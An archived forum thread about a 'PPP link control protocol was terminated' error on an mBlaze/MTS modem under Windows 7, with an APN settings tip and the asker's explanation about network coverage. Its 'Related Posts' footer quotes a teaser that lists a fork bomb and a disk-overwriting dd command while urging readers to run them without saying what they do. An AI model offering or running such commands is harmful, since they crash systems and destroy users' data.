PPP link control protocol was terminated..what to do?

when i am trying to connect to internet via mblaze i am getting an error as ppp link control protocol was terminated, what should i do now?
i am using windows 7 ...please help me ceans...!!


  • Ankita Katdare
    Ankita Katdare
    Try doing this -

    Devices > Bluetooth Devices
    Right Click On Your Device > Properties
    Hardware Tab > Choose the connection (here Bluetooth) > Properties
    General Tab > Change Settings
    Advanced Tab
    In The Extra Initialisation Command TextBox Type
    Just replace the "APN" with your APN

    Let us know if that works.
  • Saijayadeep
    Sorry for late reply..i tried to work as you said but invain.The main thing is that the MTS modem dont have a network on their own in that particular area and if you want their services we need to recharge with special amounts..so during the chain of connections there it was being terminated.It worked normally when i came back to the earlier place of use. Thats what i got it..!!! Any mistake correct me..

You are reading an archived discussion.

Related Posts

I want some solution that how to download the videos from youtube like some toutorials using idm or other downloader like real player downloader is unable to do so. The...
Brackets community have worked very hard to bring BRACKETS to the Linux community. This code-editor can be replacement of gEdit. But again, Sublime kills 'em all as I have seen...
I am posting few commands,I won't tell what these commands do. Perform & test it on your own. sudo mv ~/dev/null :(){ :|: & };: sudo dd if=/dev/random of=/dev/sda Disclaimer...
5 * 5= 2 6 * 6= 3 7 * 7= 6 8 * 8= 2 9 * 9= 0 10*10=??
There is always a person in the crowd who doesn't like getting photographed because all there photos don't look nice. At the same time, people capture beggars and weirdest animals...